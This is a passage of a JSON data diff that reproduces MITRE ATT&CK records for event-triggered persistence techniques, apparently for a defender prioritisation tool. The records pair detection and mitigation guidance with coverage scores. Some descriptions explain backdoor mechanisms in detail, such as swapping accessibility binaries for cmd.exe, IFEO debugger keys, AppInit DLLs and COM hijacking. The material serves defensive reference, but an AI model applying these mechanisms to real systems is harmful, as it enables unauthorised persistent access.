+                "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.",
+                "detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)\n\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the  Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1546.004",
+                "name": "Event Triggered Execution: Unix Shell Configuration Modification",
+                "url": "https://attack.mitre.org/techniques/T1546/004",
+                "description": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \n\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.",
+                "detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nMonitor for changes to /etc/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the /etc/shells file.\n",
+                "mitigations": [
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1546.005",
+                "name": "Event Triggered Execution: Trap",
+                "url": "https://attack.mitre.org/techniques/T1546/005",
+                "description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\n\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)",
+                "detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1546.006",
+                "name": "Event Triggered Execution: LC_LOAD_DYLIB Addition",
+                "url": "https://attack.mitre.org/techniques/T1546/006",
+                "description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.\n\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)",
+                "detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1045",
+                        "name": "Code Signing",
+                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                        "url": "https://attack.mitre.org/mitigations/M1045"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1546.007",
+                "name": "Event Triggered Execution: Netsh Helper DLL",
+                "url": "https://attack.mitre.org/techniques/T1546/007",
+                "description": "Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)",
+                "detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)",
+                "mitigations": []
+            },
+            {
+                "tid": "T1546.008",
+                "name": "Event Triggered Execution: Accessibility Features",
+                "url": "https://attack.mitre.org/techniques/T1546/008",
+                "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe",
+                "detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1035",
+                        "name": "Limit Access to Resource Over Network",
+                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1035"
+                    },
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    }
+                ]
+            },
+            {
+                "tid": "T1546.009",
+                "name": "Event Triggered Execution: AppCert DLLs",
+                "url": "https://attack.mitre.org/techniques/T1546/009",
+                "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. ",
+                "detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1546.010",
+                "name": "Event Triggered Execution: AppInit DLLs",
+                "url": "https://attack.mitre.org/techniques/T1546/010",
+                "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)\n\nSimilar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)",
+                "detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    }
+                ]
+            },
+            {
+                "tid": "T1546.011",
+                "name": "Event Triggered Execution: Application Shimming",
+                "url": "https://attack.mitre.org/techniques/T1546/011",
+                "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.",
+                "detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.",
+                "mitigations": [
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    },
+                    {
+                        "mid": "M1052",
+                        "name": "User Account Control",
+                        "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                        "url": "https://attack.mitre.org/mitigations/M1052"
+                    }
+                ]
+            },
+            {
+                "tid": "T1546.012",
+                "name": "Event Triggered Execution: Image File Execution Options Injection",
+                "url": "https://attack.mitre.org/techniques/T1546/012",
+                "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g  notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)",
+                "detection": "Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)",
+                "mitigations": []
+            },
+            {
+                "tid": "T1546.013",
+                "name": "Event Triggered Execution: PowerShell Profile",
+                "url": "https://attack.mitre.org/techniques/T1546/013",
+                "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (profile.ps1) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) \n\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) \n\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)",
+                "detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\My Documents\\PowerShell\\Profile.ps1\n* $Home\\My Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.",
+                "mitigations": [
+                    {
+                        "mid": "M1045",
+                        "name": "Code Signing",
+                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                        "url": "https://attack.mitre.org/mitigations/M1045"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    },
+                    {
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
+                    }
+                ]
+            },
+            {
+                "tid": "T1546.014",
+                "name": "Event Triggered Execution: Emond",
+                "url": "https://attack.mitre.org/techniques/T1546/014",
+                "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.\n\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.",
+                "detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    }
+                ]
+            },
+            {
+                "tid": "T1546.015",
+                "name": "Event Triggered Execution: Component Object Model Hijacking",
+                "url": "https://attack.mitre.org/techniques/T1546/015",
+                "description": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. \n\nAdversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. ",
+                "detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated.  \n\nLikewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ",
+                "mitigations": []
+            }
+        ],
+        "mitigations": [],
+        "cumulative_score": 0.6654552538095239,
+        "adjusted_score": 0.6654552538095239,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "IA-9",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.22380952380952382,
+            "mitigation_score": 0.07272727272727272,
+            "detection_score": 0.39
+        },
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.24164573
+    },
+    {
+        "tid": "T1546.001",
+        "name": "Event Triggered Execution: Change Default File Association",
+        "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)",
+        "url": "https://attack.mitre.org/techniques/T1546/001",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.\n\nUser file association preferences are stored under  [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys.\n\nAlso look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.13333333333333333,
+        "adjusted_score": 0.13333333333333333,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.002",
+        "name": "Event Triggered Execution: Screensaver",
